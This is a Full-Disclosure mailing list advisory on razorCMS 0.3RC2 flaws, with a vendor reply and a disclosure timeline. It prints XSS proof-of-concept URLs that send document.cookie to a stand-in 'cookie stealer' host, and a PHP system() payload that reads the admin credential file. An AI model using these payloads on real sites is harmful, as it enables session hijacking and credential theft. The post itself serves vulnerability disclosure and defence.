-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The following was received this morning from the author of razorCMS. It seems the threat of full disclosure really expedites vulnerability remediation ;)
"All XSS attacks are now plugged, this has been solved. The admin password now uses my own password hashing method that introduces salt in at a position that is relative to the input password length, the salt is then appended to the front of the password. ftp password is now encrypted again using my own algorithum and is only decrypted using a key stored in session. this way to get ftp password they have to look at file to get ftp password then hijack the session that is randomly changing it's session number every refresh to get the key to unlock it. the whole system now gets owned by apache, and the security manager has now gone, and been replaced with security check on main page when loging in, this checks ALL files and lets you secure ALL files. if any files are open the big box goes red, so you would have to be blind to miss it. This will also work for ftp mode too and just checking how much functionality i can get out of it for windows permissions too. There is still the option to make all files unsafe, as this can be invaluble when uninstalling razorCMS, but it is riddled with error messages and turns the box red, plus it's on the home page so you will see it every time you login. Login now bans you after X amounts of tries, for upto 60mins, you can have no more than 8 failied logins in 60mins, if you conceal your IP it will ban you from logging in. All upto 300 records are stored in a log which prunes itself to 300 records (all configurable) I have a file manager to add in the mix too, so theres been a lot of effort here to tighten things up a hell of a lot. should be about a week or two then i'll release for testing. It's still got some rough edges." All razorCMS users are encouraged to upgrade to the latest stable version (0.4) once its released in "about a week or two." One thing I accidentally left out of the disclosure below: * A permanent XSS vulnerability has been discovered in the "Page Title" field of the "Create New Page" form, making it vulnerable to permanent XSS viruses. Any script tags appended to the page title will be executed on every page view and executed three times every time the Content Manager is accessed in the admin section. This presumably has been fixed for the new release per the author's statement above. On Thu, 16 Apr 2009 02:13:23 -0700 Jeremi Gosney <[email protected]> wrote: >Multiple Vulnerability Disclosure for razorCMS >---------------------------------------------- > >A recent security audit has uncovered multiple security >vulnerabilities in the latest version (0.3RC2) and all previous >versions of razorCMS CORE by Morgan Integrated Systems. From the >vendor site: "razorCMS is an open source content management system >written in PHP, using a flat file database structure instead of >having a separate database. It has been released under the GNU >General Public License." http://razorcms.co.uk, >http://en.wikipedia.org/wiki/RazorCMS > > >* The razorCMS install script sets mode 0644 on >admin/core/admin_config.php, which contains the site owner's >cleartext FTP credentials and a sha1sum hash of the site admin >password. Any local user has access to these credentials, and the >admin password can easily be cracked offline (rainbow tables, >brute >force, etc). The vendor is planning for the use of stronger file >permissions, two-way encryption for FTP credentials, and stronger >salted hashes for admin passwords in the next release (version >0.4). > > >* razorCMS requires a laundry list of files to be mode 0777 for >installation, and promises to correct these permissions after >installation. The razorCMS install script leaves the following >directories in mode 0777 after installation: the razorCMS root >directory, the datastore/ directory, and the admin/core/ >directory. >The issue with this should be readily apparent to you. The vendor >is considering fixing the installer in the next release. > > >* The razorCMS Security Manager is "used to ensure apache owned >files have safe permissions set." In theory, if the Security >Manager detects any insecure files, it will display a warning >message and instructs the user to click a button to "secure" the >site. By the same token, if all files are found to be secure, the >Security Manager will display "All files are currently safe." The >problem is the Security Manager doesn't actually *do* anything -- >it only checks the file permissions of a handful of files, and not >even all of the Apache-owned files like it states. If a user were >to recursively chmod the razorCMS installation to 0777 (which may >be tempting for a novice user to do due to the large number of >files the installer requires to be mode 0777) and then rely on the >Security Manager to secure the site, nearly all files and >directories would be left in mode 0777 and the Security Manager >would report "All files are currently safe." The vendor does not >feel that this tool is broken, just that the phrase "All files" is >misleading and the wording should be changed. I have been >unsuccessful in convincing the vendor that the Security Manager >should *actually* secure the site, so don't expect this to be >fixed. Ever. > > >* Several cross-site scripting vulnerabilities have been >discovered in the razorCMS admin section, and will be fixed for >the >next release: >http://yoursite.com/cms/admin/?action=edit&slab=home'><script>alert >( >'http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(doc >u >ment.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgen >t >));</script><form > >http://yoursite.com/cms/admin/?action=showcats&unpub=true&slabID=1&; >c >atname=sidebar'><script>alert('http://yourcookiestealer.org/evil.ph >p >?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+% >2 >0encodeURI(navigator.userAgent));</script><form > >http://yoursite.com/cms/admin/?action=reordercat&cat=sidebar'><scri >p >t>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encod >e >URI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator. >u >serAgent));</script><form¶m=0,1 > > >* razorCMS has the ability to save content as .php files >(behaviour enabled by default, may be changed in the 'Settings' >area to html). This allows arbitrary PHP code to be injected into >any page, enabling the owner to run commands on the server with >the >privileges of the web server. This may also be exploited remotely >through a cross-site request forgery attack: for example, in an >effort to steal user credentials, an authenticated admin may be >tricked into submitting a malicious form that creates a page on >their site containing something like <?php system("cat >../../admin/core/admin_config.php"); ?>. The vendor has no plans >to >change this behaviour. > > > >Timeline: >04.06.2009 - Initial vendor notification. >04.07.2009 - Vendor dispustes vulnerabilities. >04.07.2009 - Vulnerabilities explained. >04.07.2009 - Vendor begins to implement certain fixes, refuses to >fix others. >04.07.2009 - Vulnerabilities explained again. >04.07.2009 - Vendor continues to dispute some vulnerabilities. >04.15.2009 - Vendor notified for last time. >04.16.2009 - Public Disclosure. -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAknneFgACgkQacHgESW3wZqm1AP+NZYyaoJkgJ6ALoWvEsD7sR+vyFUf 3e1q0UGIkJtvXffV7F5dGAM3IQPVpAZFS6Wx4MzzANnYOddfQI/qRZS1zpkS5axy5kjb GDDM5wTgk1kkYY2u9iiMjfYI+Lw55BEknDTePipv2zCWrpIEFeT+UmLLQHEYwHz7n+rQ XulVKDo= =3vkv -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
